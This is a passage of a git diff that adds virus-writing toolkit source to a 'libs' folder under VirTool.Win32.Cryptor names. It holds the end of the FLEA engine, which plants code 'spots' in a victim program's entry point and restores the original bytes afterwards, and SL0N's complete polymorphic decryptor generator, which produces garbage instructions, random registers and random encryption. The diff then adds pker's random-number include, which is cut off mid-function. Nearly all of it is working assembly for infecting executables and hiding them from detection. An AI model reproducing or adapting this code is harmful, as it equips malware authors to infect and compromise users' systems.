+    mov     [edx].buf_for_trash,edi
+    mov     eax,spot2
+    mov     [edx].size_trash,eax
+    push    edx
+    call    [ebx].tgen_addr                     ;2 порция мусора для очередного пятнышка 
+;-------------------------------------------------------------------------------------------------------- 
+    mov     [edx].buf_for_trash,eax  
+    mov     [edx].size_trash,3                  ;размер эпилога  
+    mov     [edx].xmask1,0b
+    mov     [edx].xmask2,1000b                  ;в маске разрешаем генерацию только эпилога (для другого генератора мусора здесь возможна генерация очередной порции мусора)    
+    push    edx
+    call    [ebx].tgen_addr                     ;запишем эпилог для очередного пятна (mov ebp,esp   pop ebp)           
+    mov     byte ptr [eax],0C3h                 ;и запишем ret 
+;--------------------------------------------------------------------------------------------------------     
+    pop     edx
+    inc     edx
+    jmp     _genspot_  
+;-------------------------------------------------------------------------------------------------------- 
+_endspot_: 
+    mov     edi,beg_rest_bytes 
+    mov     eax,num_spots                       ;корректируем кол-во записанных пятен (т.к. до этого мы не посчитали 1-ого пятна, которое всегда записывается в точке входа) 
+    inc     eax
+    stosb
+    mov     eax,start_addr
+    mov     esi,codesec
+    sub     eax,[ebx].mapped_addr
+    sub     eax,[esi].PointerToRawData
+    add     eax,[esi].VirtualAddress   
+    add     eax,base 
+;-------------------------------------------------------------------------------------------------------- 
+_enduep_:  
+    mov     esp,ebp  
+    mov     dword ptr [ebp+1Ch],eax             ;результат в EAX   
+    popad 
+    ret     4
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;конец дфункции/движка FLEA 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx     
+
+
+
+
+
+
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;функция FLEA_RESTBYTES
+;восстановление ранее сохраненных байт (на свои места)
+;ВЫХОД:
+;    - делает свое дело :)
+;EAX - кол-во сгенерированных пятен (на места которых восстановим ранее сохраненные байты) 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+FLEA_RESTBYTES:  
+    pushad  
+    cld 
+    call    _delta_ueprest_
+_delta_ueprest_:
+    pop     eax
+    sub     eax,_delta_ueprest_ 
+    lea     esi,[restore_bytes+eax]
+    push    esi 
+    xor     eax,eax 
+    lodsb
+    xchg    eax,ebx                             ;сохраняем в EBX кол-во записанных пятен    
+    mov     edx,ebx 
+_nextrestspot_: 
+    lodsd
+    xchg    eax,ecx                             ;сохраняем в ECX размер очередного пятна 
+    lodsd
+    xchg    eax,edi                             ;сохраняем в EDI адрес, где находится очередное пятно 
+    rep     movsb                               ;и запишем на место этого пятна оригинальные (ранее сохраненные) байты 
+    dec     ebx
+    jne     _nextrestspot_
+    pop     eax
+    sub     esi,eax
+    xchg    eax,esi
+    mov     dword ptr [esp+1Ch],edx   
+    popad
+    ret   
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;конец функции FLEA_REST 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+
+
+
+
+
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;функция FLEA_RESTSTACK
+;сбаланирование стэка после после пятен 
+;ВХОД (stdcall) (FLEA_RESTSTACK(DWORD num_spots)):
+;num_spots - количество отработанных в жертве пятен 
+;            (это значение можно получить из буфера restore_bytes)      
+;ВЫХОД: 
+;балансировка стэка, а также в ECX=0, EAX = адрес команды, которая выполняется сразу после вызова данной 
+;функции (FLEA_RESTSTACK); 
+;ЗАМЕТКИ:
+;   так как каждое пятно меняло регистр EBP и ESP (клало EBP  в стэк, а также адрес, следующий за 
+;   CALL'ом), то надо восстановить данные регистры, и соответственно стэк.
+;   ВАЖНО: вызывать эту функцию только тогда, когда в стэке вы уже не храните никакие данные.   
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+FLEA_RESTSTACK:
+    pop     eax 
+    pop     ecx   
+_reststack_: 
+    add     esp,4                               ;pop    edx 
+    mov     esp,ebp
+    pop     ebp
+    loop    _reststack_
+    jmp     eax
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;конец функи FLEA_RESTSTACK
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx     
+
+
+
+
+
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+;вспомогательная функция gen_mask 
+;генерация маски для мусора 
+;ВХОД (stdcall) (gen_mask(DWORD xmask)):
+;   xmask - начальная маска 
+;ВЫХОД: 
+;   EAX - новая маска 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+gen_mask:
+    push    ecx
+    mov     ecx,dword ptr [esp+08]     
+    push    -1 
+    call    [ebx].rgen_addr
+    and     ecx,eax
+    rol     eax,10h 
+    push    eax
+    call    [ebx].rgen_addr 
+    and     ecx,eax   
+    xchg    eax,ecx
+    pop     ecx
+    ret     4 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+;конец функции gen_mask 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+    
+
+
+
+
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;вспомогательная функция get_jmpaddr
+;получение операнда для jmp'a, который будет прыгать на следующее пятно 
+;ВЫХОД:
+;ЕАХ - искомое значение 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+get_jmpaddr:
+    push    max_jmp 
+    call    [ebx].rgen_addr
+    cmp     eax,min_jmp
+    jb      get_jmpaddr  
+    ret   
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;конец функции get_jmpaddr 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
+
+
+
+
+
+
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;вспомогательная функция mix_addr
+;перемешивание случайным образом данных в массиве
+;заметки: в данном движке используется для перемешивания случаным образом адресов пятен
+;ВХОД ( mix_adr(DWORD *addr_mas, DWORD num_elem) ): 
+;addr_mas - адрес буфера(массива), где находятся значения, которые следует перемешать
+;num_elem - кол-во этих самых элементов
+;ВЫХОД:
+;перемешанные адреса в буфере(массиве)    
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+mix_addr:
+    pushad                  ;
+    mov     ecx,dword ptr [esp+28h]             ;ECX - кол-во элементов    
+    mov     esi,dword ptr [esp+24h]             ;ESI - адрес буфера, где находятся эти элементы  
+    xor     edx,edx 
+_nxtmix_: 
+    push    ecx
+    call    [ebx].rgen_addr                     ;получаем СЧ [0..ECX-1]
+    push    dword ptr [esi+edx*4]               ;и перемешиваем     
+    push    dword ptr [esi+eax*4]
+    pop     dword ptr [esi+edx*4]
+    pop     dword ptr [esi+eax*4]
+    inc     edx
+    cmp     edx,ecx
+    jne     _nxtmix_                            ;если перемешали все элементы, то на выход 
+            
+    popad  
+    ret     4*2 
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+;конец функции mix_addr
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+
+  
+
+
+
+
+
+;========================================================================================================
+;вспомогательные переменные (находятся в стэке) 
+;========================================================================================================  
+imNTh               equ     dword ptr [ebp-04]  ;указатель на IMAGE_NT_HEADERS 
+old_ep              equ     dword ptr [ebp-08]  ;старая точка входа
+base                equ     dword ptr [ebp-12]  ;ImageBase 
+new_ep              equ     dword ptr [ebp-16]  ;новая точка входа (в конец последней секции) 
+start_addr          equ     dword ptr [ebp-20]  ;физический адрес точки входа (+ база мэппинга)  
+codesec             equ     dword ptr [ebp-24]  ;указатель на кодовую секцию в табличке секций 
+size_codesec        equ     dword ptr [ebp-28]  ;размер в кодовой секции, который реально можно использовать для записи пятен 
+max_codesec_addr    equ     dword ptr [ebp-32]  ;максимальный допустимый адрес в кодовой секции, до которого можно записывать пятна 
+cur_codesec_addr    equ     dword ptr [ebp-36]  ;текущий адрес в кодовой секции (используется для получения очередного адреса нового пятнышка) 
+num_spots           equ     dword ptr [ebp-40]  ;кол-во реально записанных пятен в кодовую секцию 
+beg_rest_bytes      equ     dword ptr [ebp-44]  ;адрес буфера, где хранится кол-во записанных пятен, размеры их, адреса, а также оригинальные байты кодовой секции 
+cur_rest_bytes      equ     dword ptr [ebp-48]  ;текущий адрес в буфере (вспомогтальная переменная), куда сохраняем оригинальные байты кодовой секции etc 
+spot1               equ     dword ptr [ebp-52]  ;размер 1-ой порции мусора (этих первых порций мусора столько, сколько пятен будем записывать) (также вспомогательная переменная) 
+spot2               equ     dword ptr [ebp-56]  ;размер 2-ой порции мусора etc 
+tgen_struct         equ     dword ptr [ebp-60]  ;адрес структуры TRASHGEN (для трэшгена xTG - или другого тэшгена)     
+xtmask1             equ     dword ptr [ebp-64]  ;новая маска1
+xtmask2             equ     dword ptr [ebp-68]  ;новая маска2  
+
+restore_bytes       db      MAX_SPOTS*(uportion1+uportion2+7+10)+MAX_SPOTS*(4+4)+101 dup (00h);буфер, представляющий собой следующую структуру:   
+                                                ;num_spots              db  1               ;кол-во записанных пятен в кодовой секции 
+                                                ;size_spot1             dd  1               ;размер очередного пятна
+                                                ;addr_spot1             dd  1               ;адрес очередного пятнышка              
+                                                ;save_bytes1            db  size_spot1      ;сохраненные оригинальные байты (вместо которых мы и записали очередное пятно) 
+                                                ;size_spot2             dd  1               ;etc 
+                                                ;addr_spot2             dd  1
+                                                ;save_bytes2            db  size_spot2
+                                                ;...
+                                                ;size_spot(num_spots)   dd  1
+                                                ;addr_spot(num_spots)   dd  1
+                                                ;save_bytes(num_spots)  db  size_spot(num_spots) 
+   
+UEP_RESTBYTES_SIZE  equ     $ - restore_bytes   ;размер буфера, что выше 
+;========================================================================================================           
+
diff --git a/libs/VirTool.Win32.Cryptor.Mixer.7z b/libs/VirTool.Win32.Cryptor.Mixer.7z
new file mode 100644
index 00000000..87202e33
Binary files /dev/null and b/libs/VirTool.Win32.Cryptor.Mixer.7z differ
diff --git a/libs/VirTool.Win32.Cryptor.Pgs.asm b/libs/VirTool.Win32.Cryptor.Pgs.asm
new file mode 100644
index 00000000..695e2a06
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.Pgs.asm
@@ -0,0 +1,334 @@
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;                       [POLYMORPHIC GENERATOR OF SHIT V. 0.4]                 ;
+;                                                                              ;
+;		      #########        ########      ########                  ;
+;		      ###########    ##########    ##########                  ;
+;		      ##### ######  ######   ##   ######   ##                  ;
+;		      #####  #####  #####         #####                        ;
+;		      #####  #####  #####          ########                    ;
+;		      ###########   ##### ######     ########                  ;
+;		      #########     ##### ######         #####                 ;
+;		      #####         #####    ###         #####                 ;
+;		      #####          ###########  ###########                  ;
+;		      #####            ##### ###  #########                    ;
+;                                                                              ;
+;                                  FOR MS WINDOWS                              ;
+;                                                                              ;
+;                                     BY SL0N                                  ;
+;------------------------------------------------------------------------------;
+;                                    MANUAL:                                   ;
+; BUFFER FOR ENCRYPTED CODE + DECRYPTORS  -> EDI                               ;
+; START OF CODE 	                  -> EAX                               ;
+; SIZE OF CODE  	                  -> ECX                               ;
+;                                                                              ;
+; CALL MORPH                                                                   ;
+;                                                                              ;
+; SIZE OF ENCRYPTED CODE + DECRYPTORS     -> ECX                               ;
+; BUFFER WITH ENCRYPTED CODE + DECRYPTORS -> EDI			       ;
+;------------------------------------------------------------------------------;
+; (+) DO NOT USE WIN API                                                       ;
+; (+) EASY TO USE                                                              ;
+; (+) GENERATE GARBAGE INSTRUCTIONS (1,2,3,4,5,6 BYTES)                        ;
+; (+) USE DELTA OFFSET                                                         ;
+; (+) USE X87 INSTRUCTIONS                                                     ;
+; (+) IT CREATES VARIABLE DECRYPTOR SIZE                                       ;
+; (+) RANDOMLY CHANGE REGISTERS IN INSTRUCTIONS                                ;
+; (+) RANDOM 32 BIT ENCRYPTION ALGORITHM (ADD/SUB/XOR)                         ;
+; (+) RANDOM NUMBER OF DECRYPTORS                                              ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+morph:
+                push	esi ebp                    ; Сохраняем регистры 
+
+		call	delta0                     ; 
+delta0:                                            ; Вычисляем 
+		pop	ebp                        ; дельта смещение
+		sub	ebp,offset delta0          ;
+
+		push	eax                        ; Кладём в стэк eax
+decr_number:                                       
+		mov	eax,40                     ; Генерируем случайное число
+		call	brandom32                  ; в диапазоне 0..30
+		test	eax,eax                    ; Если число равно 0, то оно
+		jz	decr_number                ; нам не подходит
+		mov	ebx,eax                    ; Помещаем число в ebx
+		pop	eax                        ; Восстанавливаем eax
+multi_decr:		                           
+		mov	edx,edi
+		call	polym                      ; 
+		mov	eax,edx                    ; 
+		add	edi,ecx                    ; Генерируем столько 
+		dec	ebx                        ; декрипторов, сколько
+		test	ebx,ebx                    ; записано в регистре ebx
+		jnz	multi_decr                 ;
+
+		sub	edi,ecx                    ; результатами
+		
+		pop	ebp esi                    ; Восстанавливаем регистры
+                ret                                ; Возврат из подпрограммы
+;------------------------------------------------------------------------------;
+polym:
+		push	ebp edi esi ebx            ; Сохраняем регистры
+
+		mov	[ebp+sz_code],ecx          ; Заносим параметры старта
+		mov	[ebp+begin_code],eax       ; из регистров в переменные
+		mov	[ebp+buff],edx             ;
+		mov	edi,edx	                   ;
+;------------------------------------------------------------------------------;
+		call	len_gen                    ; Вызываем генератор длин
+		mov	[ebp+sz_decr],40
+		add	[ebp+sz_decr],ecx          ; добавляем длины мусора к
+                                                   ; размеру декриптора
+
+		call	reg_mutate		   ; Выбираем регистры, которые
+		                                   ; будут использоваться в
+						   ; декрипторе
+
+		mov	ecx,[ebp+len+0]            ; И генерируем первую партию
+		call	garbage                    ; мусорных инструкций
+
+		mov	al,0e8h			   ; Генерируем следующую
+		stosb                              ; инструкцию: call $+5
+		xor	eax,eax                    ;
+		stosd                              ; 
+
+		mov	ecx,[ebp+len+4]            ; Генерируем новую партию
+		call	garbage                    ; мусорных инструкций
+
+	        mov	al,58h                     ; Генерируем следующую
+		add	al,bh                      ; инструкцию декриптора:
+		stosb	                           ; pop reg1
+
+		mov	ecx,[ebp+len+8]		   ; Генерируем мусорные
+		call	garbage                    ; инструкции
+
+		                                   ; Генерируем следующую
+		mov	al,81h                     ; инструкцию декриптора:
+		stosb                              ; add reg1,sz_decr-len[0]
+		mov	al,0c0h                    ; 
+		add	al,bh                      ; Таким образом reg1 будет
+		stosb                              ; указывать на начало
+		                                   ; закриптованного кода
+		mov	eax,[ebp+sz_decr]          ;
+		sub	eax,[ebp+len]	           ;
+		sub	eax,9			   ; 
+		stosd				   ;
+
+		mov	ecx,[ebp+len+12]	   ; Генерируем мусорные
+		call	garbage                    ; инструкции
+
+		mov	al,8bh			   ; Генерируем инструкцию:
+		stosb                              ; mov reg2,reg1
+		                                   ;
+		mov	al,bl                      ; У нас reg2 позже будет
+		shl	al,3			   ; использоваться для
+		add	al,0c0h                    ; сравнения
+		add	al,bh                      ;
+		stosb
+
+		mov	ecx,[ebp+len+16]	   ; Генерируем мусорные
+		call	garbage                    ; инструкции
+
+		mov	al,81h                     ;
+		stosb                              ; 
+		mov	al,0c0h                    ;
+		add	al,bl                      ;
+		stosb                              ;
+			                           ; Генерируем инструкцию:
+		mov	eax,[ebp+sz_code]          ; add reg2,size_code
+		inc	eax
+		stosd                              ;
+
+		mov	ecx,[ebp+len+20]	   ; Генерируем мусорные
+		call	garbage                    ; инструкции
+
+		mov	al,81h                     ;
+		stosb                              ; Генерируем следующую
+		mov	al,0c0h                    ; инструкцию: add reg1,4
+		add	al,bh                      ;
+		stosb                              ;
+		                                   ;
+		mov	eax,4                      ;
+		stosd                              ;
+
+		mov	ecx,[ebp+len+24]           ; Генерируем следующую
+		call	garbage                    ; партию мусора
+
+		call	random32                   ;
+		mov	[ebp+key2],eax             ; Сохраняем ключ криптования
+
+		lea	eax,[ebp+next]             ; Кладём в стэк смещение
+		push	eax                        ; на метку next
+						   ; Выбираем один из трёх
+		                                   ; вариантов криптования
+		mov	eax,3                      ; случайным образом.
+		call	brandom32                  ;
+		                                   ; Алгоритмы криптования и
+		cmp	al,1                       ; декриптования:
+		je	enc_add32                  ;
+		                                   ; 1) XOR
+		cmp	al,2                       ; 2) ADD
+		je	enc_sub32                  ; 3) SUB
+enc_xor32:
+		                                   
+		mov	al,81h                     ;
+		stosb                              ; Генерируем инструкцию:
+		mov	al,30h                     ; xor [reg1],key_decrypt
+		add	al,bh                      ;
+		stosb                              ;
+		mov	eax,[ebp+key2]
+		stosd
+
+		push	edi                        ; 
+		lea	edi,[ebp+crypt_n]          ; 
+		mov	al,33h                     ; А в самом движке меняется
+		stosb                              ; алгоритм криптования 
+		pop	edi                        ;
+		ret                                ; Переход на метку next
+enc_add32:
+		mov	al,81h                     ; 
+		stosb                              ; Генерируем инструкцию:
+		mov	al,bh                      ; add [reg1],key_decrypt
+		stosb                              ;
+
+		mov	eax,[ebp+key2]
+		stosd
+
+		push	edi                        ; 
+		lea	edi,[ebp+crypt_n]          ; 
+		mov	al,2bh                     ; А в самом движке меняется
+		stosb                              ; алгоритм криптования 
+		pop	edi                        ;
+		ret                                ; Переход на метку next
+
+enc_sub32:
+		mov	al,81h                     ;
+		stosb                              ; Генерируем следующую
+		mov	al,028h                    ; инструкцию:
+		add	al,bh                      ; sub [reg1],key_decrypt
+		stosb                              ;
+
+		mov	eax,[ebp+key2]
+		stosd
+
+		push	edi                        ;
+		lea	edi,[ebp+crypt_n]          ; А в самом движке меняем
+		mov	al,03h                     ; алгоритм криптования
+		stosb                              ;
+		pop	edi                        ;
+		ret                                ; Переход на метку next
+;------------------------------------------------------------------------------;
+next: 
+		mov	ecx,[ebp+len+28]           ; Генерируем очередную
+		call	garbage                    ; партию мусора
+                                                   
+		mov	al,3bh                     ; 
+		stosb                              ;
+			                           ;
+		xor	eax,eax                    ;
+		mov	al,bh                      ; Генерируем инструкцию:
+		shl	al,3                       ; cmp reg1,reg2
+		add	al,0c0h                    ;
+		add	al,bl                      ;
+		stosb                              ;
+;------------------------------------------------------------------------------;
+		mov	ax,820fh                   ; 
+		stosw                              ; 
+		xor	eax,eax                    ;
+		dec	eax                        ; Генерируем инструкцию:
+		mov	ecx,7*4                    ; jb decrypt
+		sub	eax,[ebp+len+ecx]          ;
+		mov	ecx,6*4                    ;
+		sub	eax,[ebp+len+ecx]          ;
+		sub	eax,19                     ;  
+		stosd                              ;
+
+	        mov	ecx,[ebp+len+32]           ; Генерируем мусорные
+		call	garbage                    ; инструкции
+;------------------------------------------------------------------------------;
+		mov	ecx,[ebp+sz_code]          ;
+		mov	esi,[ebp+begin_code]       ;
+		add	ecx,esi                    ;
+encrypt:                                           ;
+		lodsd                              ; Криптуем весь код ключом
+crypt_n:                                           ; и нужным алгоритмом
+		xor	eax,[ebp+key2]             ;
+		stosd                              ;
+		cmp	esi,ecx                    ;
+		jl	encrypt                    ;
+
+		mov	edx,[ebp+buff]             ; Заполняем регистры
+		mov	ecx,[ebp+sz_code]          ; результатами
+		add	ecx,[ebp+sz_decr]          ;
+
+		pop	ebx esi edi ebp            ; Востанавливаем регистры
+		ret                                ; И выходим из процедуры
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;     		      GARBAGE LENGTH GENERATOR SUBROUTINE                      ;
+;------------------------------------------------------------------------------;
+;			          [ IN ]				       ;
+;                                                                              ;
+;          		    NO INPUT IN SUBROTINE                              ;
+;------------------------------------------------------------------------------;
+;			          [ OUT ]				       ;
+;						 			       ;
+;               	 LENGTH OF ALL GARBAGE -> ECX                          ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+len_gen:                                           ; Подпрограмма генерации
+                                                   ; длин для мусорных
+						   ; инструкций
+		xor	ecx,ecx                    ; Обнуляем esi и ecx
+		xor	esi,esi                    ;
+loop1:                                             ;
+		mov	eax,100                    ;
+		call	brandom32                  ; Начинаем генерацию
+			                           ; длин, каждое число
+		mov	[ebp+len+esi],eax          ; диапазоне 0..100
+		add	ecx,eax                    ;
+		add	esi,4                      ;
+		cmp	esi,36                     ;
+		jne	loop1                      ;
+		ret                                ; Возврат из подпрограммы
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+;			  REGISTER MUTATOR SUBROUTINE		               ;
+;------------------------------------------------------------------------------;
+;			             [ IN ]				       ;
+;                                                                              ;
+;          		     NO INPUT IN SUBROTINE                             ;
+;------------------------------------------------------------------------------;
+;			             [ OUT ]				       ;
+;									       ;
+;                         USES REGISTER N1 -> BH (0..7)                        ;
+;                         USES REGISTER N2 -> BL (0..7)                        ;
+;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
+reg_mutate:                                         
+                                                   ; Подпрограмма генерации
+generate1:                                         ; регистров для декриптора
+
+		mov	eax,8                      ; Получаем случайное число
+		call	brandom32                  ; в диапазоне 0..7
+		cmp	al,00000100b               ; Используем все регистры 
+		je	generate1                  ; кроме esp
+		cmp	al,00000101b               ; Используем все регистры 
+		je	generate1                  ; кроме ebp
+		mov	bh,al                      ; Сохраняем полученный
+		                                   ; регистр
+generate2:
+		mov	eax,8                      ; Получаем случайное число
+		call	brandom32                  ; в диапазоне 0..7
+		cmp	al,bh                      ; Не должно быть двух
+		je	generate2                  ; идентичных регистров
+		cmp	al,00000100b               ; Используем все регистры 
+		je	generate2                  ; кроме esp
+		mov	bl,al                      ; Сохраняем полученный
+		                                   ; регистр
+		ret                                ; Возврат из подпрограммы
+;------------------------------------------------------------------------------;
+sz_decr         dd	0                  	   ; 
+begin_code      dd	0                          ; Данные необходимые для
+st_code         dd	0                          ; корректной работы 
+sz_code         dd	0                          ; генератора
+buff		dd	0			   ;
+key2            dd	0                          ;
+;------------------------------------------------------------------------------;
+	len	dd	0,0,0,0,0,0,0,0,0          ; Место для хранения длин
+;------------------------------------------------------------------------------;
diff --git a/libs/VirTool.Win32.Cryptor.Pkrng.inc b/libs/VirTool.Win32.Cryptor.Pkrng.inc
new file mode 100644
index 00000000..9c80351a
--- /dev/null
+++ b/libs/VirTool.Win32.Cryptor.Pkrng.inc
@@ -0,0 +1,222 @@
+;
+; pker's Random Number Generator (PKRNG)
+; ======================================
+;
+;
+; Description
+; -----------
+;
+; PKRNG is a random number generator. It can be used for MASM, TASM, FASM, etc. It
+; containz   four   procedurez:  __randomize,   __random   and   __m_seq_gen   and
+; __random_rdtsc. __randomize procedure is for generating initial seed in the seed
+; field,   which  specified  as  parameter.   The __m_seq_gen procedure is used to
+; generate   m-sequence,  which  used  by __random,  which generate random numberz
+; finally. __random_rdtsc is the simplest one, it just get the RDTSC and divide it
+; by the range given as parameter.
+;
+;
+; How to use PKRNG
+; ----------------
+;
+; When using MASM or TASM to initialize seed field:
+;
+;       mov   edi,offset dwSeed
+;       call  __randomize
+;
+; The get a random number in eax:
+;
+;       mov   eax,offset dwSeed
+;       mov   ecx,32                    ; get a random number between 0~31
+;       call  __random
+;
+;
+; Same thing happened with FASM:
+;
+;       mov   edi,dwSeed
+;       call  __randomize
+;
+;       mov   eax,dwSeed
+;       mov   ecx,32                    ; get a random number between 0~31
+;       call  __random
+;
+;
+; Copyright
+; ---------
+;
+; (c) 2004. No rightz reserved. Use without permission :P.
+;
+
+
+;
+; __randomize procedure
+; =====================
+;
+;
+; Description
+; -----------
+;
+; This function use RDTSC instruction to generator a random number in order to
+; initialize the seed field.
+;
+;
+; Parameterz and Return Values
+; ----------------------------
+;
+; input:
+;       edi --- points to the seed field
+; output:
+;       nothing
+;
+
+__randomize:    pushad
+                db      0fh,31h                 ; RDTSC
+                add     eax,edx                 ; ...
+                stosd                           ; fill in the seed buffer
+                popad
+                ret
+
+
+;
+; __random procedure
+; ==================
+;
+;
+; Description
+; -----------
+;
+; This function generates a random number and rewrite the seed field. The function
+; first get a 32 bit m-sequence, which then multiply with the previous seed,  with
+; __m_seq_gen procedure.  And then, it calls __m_seq_gen again to generate another
+; m-sequence  to make noise by adding on the DWORD calculated before.  Also,  this
+; result is the new seed, and will be write to the seed field which pointed by EAX
+; as argument.  Finally, the seed is divided by ECX, and return the modulus, which
+; is the expected random number.
+;
+;
+; Parameterz and Return Values
+; ----------------------------
+;
+; input:
+;       eax --- pointz to the random seed field
+;       edx --- the range of the random number to be generated
+; output:
+;       eax --- random number as result
+;
+
+__random:       pushad
+                xchg    ecx,edx
+                mov     edi,eax
+                mov     esi,eax
+                lodsd                           ; get the previous seed value
+                mov     ebx,eax
+                mov     ebp,ebx
+                call    __m_seq_gen             ; generate a m-sequence
+                imul    ebp                     ; multiply with the previous seed
+                xchg    ebx,eax
+                call    __m_seq_gen             ; generate anothe m-sequence
+                add     eax,ebx                 ; to make noise...
+                add     eax,92151fech           ; and some noisez...
+                stosd                           ; write new seed value
+                xor     edx,edx
+                div     ecx                     ; calculate the random number
+                mov     [esp+28],edx            ; according to a specified range
+                popad
+                ret
+
+
+;
+; __m_seq_gen procedure
+; =====================
+;
+;
+; Description
+; -----------
+;
+; This function use a  PN  (Pseudo Noise)  generator to generate m-sequencez.  The
+; configuration of the generator shows below (figure 1):
+;
+;                    (module 2 addition)
+;                           ___
+;                          /   \
+;              +---------- | + | <------------------------------+
+;              |           \___/                                |
+;              |             A                                  |
+;              |    +-----+  |   +-----+               +-----+  |
+;              +--> | D31 | -+-> | D30 | ---> ... ---> | D01 | -+-> output
+;                   +-----+      +-----+               +-----+
+;                      A            A                     A
+;                      |            |                     |
+;   CLK ---------------+------------+---------------------+
+;
+;                     figure 1. m-Sequence Generator
+;
+;
+; Parameterz and Return Values
+; ----------------------------
+;
+; input:
+;       eax --- a non-zero random number, which could  be generated by RDTSC or
+;               GetTickCount or such functionz
+; output:
+;       eax --- the result of the function
+;
+
+__m_seq_gen:    pushad
+                xor     esi,esi                 ; use to save the 32bit m-sequence
+                push    32                      ; loop 32 times (but it's not a
+                pop     ecx                     ; cycle in the m-sequence generator)
+msg_next_bit:   mov     ebx,eax
+                mov     ebp,ebx
+                xor     edx,edx
+                inc     edx
+                and     ebp,edx                 ; get the lowest bit
+                dec     cl
+                shl     ebp,cl
+                or      esi,ebp                 ; output...
+                inc     cl
